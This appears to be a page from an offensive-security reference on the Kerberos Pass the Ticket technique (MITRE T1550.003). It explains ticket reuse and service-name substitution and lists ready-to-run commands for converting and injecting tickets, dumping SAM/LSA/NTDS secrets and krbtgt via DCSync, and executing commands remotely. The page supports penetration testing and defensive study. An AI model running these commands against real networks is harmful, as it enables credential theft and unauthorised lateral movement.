Comment on page
Pass the ticket
MITRE ATT&CK™ Sub-technique T1550.003
There are ways to come across (cached Kerberos tickets) or forge (overpass the hash, silver ticket and golden ticket attacks) Kerberos tickets. A ticket can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass the ticket. Another name for this is Pass the Cache (when using tickets from, or found on, UNIX-like systems).
Tip: convert ticket to UNIX <-> Windows format
# Windows -> UNIX
ticketConverter.py $ticket.kirbi $ticket.ccache
# UNIX -> Windows
ticketConverter.py $ticket.ccache $ticket.kirbi
Once a ticket is obtained/created, it needs to be referenced in the
KRB5CCNAMEenvironment variable for it to be used by others tools.
# use a .kirbi file
# use a .ccache file
Rubeus.exe ptt /ticket:"base64 | file.kirbi"
It is then possible to list the tickets in memory using the
- On Windows, once Kerberos tickets are injected, they can be used natively.
- On UNIX-like systems, once the
KRB5CCNAMEvariable is exported, the ticket can be used by tools that support Kerberos authentication.
secretsdump.py -k $TARGET
crackmapexec smb $TARGETS -k --sam
crackmapexec smb $TARGETS -k --lsa
crackmapexec smb $TARGETS -k --ntds
crackmapexec smb $TARGETS -k -M lsassy
crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
lsassy -k $TARGETS
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
psexec.py -k 'DOMAIN/USER@TARGET'
smbexec.py -k 'DOMAIN/USER@TARGET'
wmiexec.py -k 'DOMAIN/USER@TARGET'
atexec.py -k 'DOMAIN/USER@TARGET'
dcomexec.py -k 'DOMAIN/USER@TARGET'
crackmapexec winrm $TARGETS -k -x whoami
crackmapexec smb $TARGETS -k -x whoami
.\PsExec.exe -accepteula \\$TARGET cmd
When requesting access to a service, a Service Ticket is used. In contains enough information about the user to allow the destination service to decide to grant access or not, without asking the Domain Controller. These information are stored in a protected blob inside the ST called PAC (Privilege Attribute Certificate). In theory, the user requesting access can't tamper with that PAC.
Another information stored in the ST, outside of the PAC, and unprotected, called
sname, indicates what service the ticket is destined to be used for. This information is basically the SPN (Service Principal Name) of the target service. It's split into two elements: the service class, and the hostname.
Their are multiple service classes for multiple service types (LDAP, CIFS, HTTP and so on) (more info on adsecurity.org). The problem here is that since the SPN is not protected, there are scenarios (e.g. services configured for constrained delegations) where the service class can be modified in the ticket, allowing attackers to have access to other types of services.
tgssub.py -in ticket.ccache -out newticket.ccache -altservice "cifs/target"
Rubeus.exe tgssub /altservice:cifs /ticket:"base64 | ticket.kirbi"